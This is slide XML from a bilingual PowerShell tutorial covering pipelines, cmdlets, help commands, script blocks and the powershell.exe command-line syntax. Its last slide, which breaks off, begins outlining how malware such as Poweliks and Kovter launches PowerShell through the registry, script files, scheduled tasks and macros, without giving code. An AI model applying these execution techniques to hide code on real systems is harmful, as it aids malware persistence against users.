                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>物件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altLang="zh-TW" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>而非字串 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(string)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。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PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>物件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>來</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>傳遞的理由是不需要重新解析字串，當物件傳到下一個指令時可直接使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。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Michelle Chen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組合多項</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指令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3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60" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>使用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Get-Item</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>將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FolderA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>目錄下的的所有檔案列出來，導給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Move-Item</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指令，將這些檔案搬移至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FolderB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>目錄中：</a:t>
            </a:r>
          </a:p>
          <a:p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Get-Item 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FolderA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| Move-Item </a:t>
            </a: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–Destination </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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FolderB</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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8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 | Where-Object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{ $_.Handles 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ge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 1000 }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Sort-Object Handles | Format-Table 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Handles,Name,Description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–Auto</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0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Where-Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>script blocks use the special variable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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to refer to the current object in the pipeline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3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09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為所有的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>cmdlet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>都定義了簡短的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>別名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>（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aliases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r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>這行指令預設的別名是 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gps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別名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50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中可用的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>cmdlet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指令數量相當多，我們不太可能記得所有的指令名稱與用法，實務上的做法通常都是遇到問題時，再去查詢有哪些相關的指令可以使用。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>若想要以關鍵字來尋找相關的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>cmdlet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指令，可以使用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Get-Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>配合萬用字元（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zh-TW" altLang="en-US" dirty="0"/>
              <a:t>）來搜尋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/>
              <a:t>例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>搜尋含有 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>關鍵字的指令就可以執行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Get-Command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*process*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查詢指令與物件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用法 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(1)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en-US" altLang="zh-TW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14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675467"/>
            <a:ext cx="8496943" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>若想要查詢某個指令的詳細用法，可以使用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Get-Help</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>加上指令名稱來查詢，例如查詢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Stop-Process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的用法就可以執行：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Get-Help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Stop-Process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查詢指令與物件用法 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(2)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en-US" altLang="zh-TW" dirty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00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.NET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>框架</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>的物件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>種類，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>再加上每一種物件的用法都不同，所以在使用物件時，我們也時常會需要查詢各種物件可用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>屬性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>方法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若要查詢一個物件有哪些屬性與方法，可以將物件透過管線的方式導給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Get-Member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。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zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>查詢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altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0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/>
              <a:t>這個字串物件的屬性與方法：</a:t>
            </a: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Hello" | Get-Member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查詢物件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(1)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48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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>或是將儲存在變數中的物件導給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Get-Member</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>也可以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$result = Get-Process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| Get-Member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查詢物件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(2)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79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u="sng" dirty="0"/>
              <a:t>命令列環境的指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>其實也是電腦程式。這些程式本身沒有 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>GUI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，需搭配命令列環境來使用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的指令的主要來源如下：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>cmdlet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>cmdlet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的別名 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(alias)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令提示字元指令</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>批次檔</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>外部程式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指令的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>組成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Michelle Chen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97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/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內建的指令稱為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>cmdlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> (command-let)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別名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>並不是真正的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>cmdlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，只是給 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>cmdlet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>起個短名。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內建的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>功能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Michelle Chen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98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>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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PowerShell commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> are interpreted line by line with an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interpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> instead of a compiler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2" tooltip="Chiradeep BasuMallick"/>
              </a:rPr>
              <a:t>Chiradeep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2" tooltip="Chiradeep BasuMallick"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2" tooltip="Chiradeep BasuMallick"/>
              </a:rPr>
              <a:t>BasuMallick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>It is possible to invoke a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PowerShell script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> by specifying the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PowerShell interpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> as the command and the script as an argument, but the suffix of the file must still be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  <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Hyperpolyglot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]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-file .\test.ps1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PowerShell Interpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
            </a:b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1873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3900190"/>
            <a:ext cx="7408333" cy="2409130"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>實際輸入的方式是每撰寫一行就按一次 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>Enter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 鍵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。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PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>環境會自動換行。尾端輸入空行後會結束該程式碼片段並執行。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>如果碰到較長或需重覆使用的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程式，還是會寫在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>命令稿</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>後再執行。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在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中撰寫多行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>程式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Michelle Chen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]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2060848"/>
            <a:ext cx="8003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($true) {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Write-Host "Hello World"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}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PS &gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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CLI: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>command-line interface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You can get the same information by running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-?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zh-TW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altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>is short for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3ACC-DB9C-41B7-AAD9-18557339C754}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>31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Windows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en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>parameters/CLI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 smtClean="0"/>
              <a:t>][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" u="sng" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>mklement0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37888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132856"/>
            <a:ext cx="7408333" cy="44644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PowerShell[.exe]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PSConsoleFile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&lt;file&gt; | -Version &lt;version&gt;]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NoLogo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Mta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NoProfile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NonInteractive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InputFormat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{Text | XML}]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OutputFormat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{Text | XML}]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WindowStyle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&lt;style&gt;]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EncodedCommand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&lt;Base64EncodedCommand&gt;]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ConfigurationName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&lt;string&gt;]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[-File - | &lt;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filePath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[-Command - | { &lt;script-block&gt; [-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-array&gt;] }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| { &lt;string&gt; [&lt;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CommandParameters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&gt;] } ]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PowerShell[.exe] -Help | -? | /?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3ACC-DB9C-41B7-AAD9-18557339C754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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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 smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18518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programming language, a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 block</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is a collection of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altLang="zh-TW" dirty="0"/>
              <a:t> or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en-US" altLang="zh-TW" dirty="0"/>
              <a:t> that can be used as a single unit. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>script block can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accept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en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and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return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Script Block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6141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Syntactically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, a script block is a statement list in braces, as shown in the following syntax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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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list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zh-TW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Syntax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18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script block returns the output of all the commands in the script block, either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as a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object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marL="301943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or </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>an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Return Results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18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3" y="2675467"/>
            <a:ext cx="8784976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Like functions, a script block can include parameters. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the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zh-TW" dirty="0"/>
              <a:t> keyword to assign named parameters, as shown in the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>syntax.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="301943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([type]$Parameter1 [,[type]$Parameter2])</a:t>
            </a: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list&gt;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Parameters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72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568952" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>A script block is an instance of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>a Microsoft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.NET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type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>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System.Management.Automation.ScriptBlock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Script Block Type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44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dirty="0"/>
              <a:t> type may be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contained </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>an existing variable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>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returned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>an expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="301943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    or </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>parsed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>by the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host as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>a literal script block enclosed in curly braces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> (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altLang="zh-TW" dirty="0"/>
              <a:t>),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before </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>being passed to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Example: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-Command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{Get-</a:t>
            </a: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WinEvent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LogName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security}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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dirty="0"/>
              <a:t> T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>ype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>
            <a:off x="7308304" y="4581128"/>
            <a:ext cx="0" cy="108012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0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2675467"/>
            <a:ext cx="8640960" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Commands can have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>script block parameter values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For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>example, the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cmdlet has a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" u="sng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parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>that takes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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script block value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, as shown in this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>example: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Get-Process }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39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Command Parameters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3779912" y="3861048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6732240" y="3861048"/>
            <a:ext cx="0" cy="432048"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln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564904"/>
            <a:ext cx="8424936" cy="3744416"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> can be executed in either one of the following ways:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>Registry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>This technique was extensively used by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Poweliks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>kovter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> malware variants ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mshta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>rundll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ActiveXObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>File:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>.ps1 / .VBS / .BAT and scheduled task.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>Macros:</a:t>
            </a:r>
